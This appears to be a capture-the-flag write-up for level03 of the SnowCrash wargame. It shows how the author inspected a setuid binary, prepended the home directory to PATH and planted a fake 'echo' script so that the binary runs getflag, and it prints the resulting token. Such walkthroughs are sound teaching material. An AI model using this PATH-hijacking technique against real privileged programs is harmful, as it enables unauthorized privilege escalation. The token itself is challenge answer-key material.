# Level03

- We get a `level03` executable in the home.
- With a quick look at it's symbols we get:
	```bash
	level03@SnowCrash:~$ nm -u level03
	[...]
	         U getegid@@GLIBC_2.0
	         U geteuid@@GLIBC_2.0
	         U setresgid@@GLIBC_2.0
	         U setresuid@@GLIBC_2.0
	         U system@@GLIBC_2.0
	```
	So we learn that we use the glibc id commands.  
	It probably means we have to change the process id of the executable.

- Listing the strings from the `level03` file we get a very subtle message:
	```bash
	level03@SnowCrash:~$ strings level03
	[...]
	/usr/bin/env echo Exploit me
	[...]
	```
- Let's change the shell path a little:
	```bash
	level03@SnowCrash:~$ chmod +rwx .
	level03@SnowCrash:~$ PATH=~/:$PATH
	```
- Now we create the evil `echo` so now it calls the getflag bin
	```bash
	level03@SnowCrash:~$ echo "/bin/getflag" > echo
	level03@SnowCrash:~$ chmod +x echo
	```
- Then exec the `level03`
	```bash
	level03@SnowCrash:~$ ./level03
	Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
	```
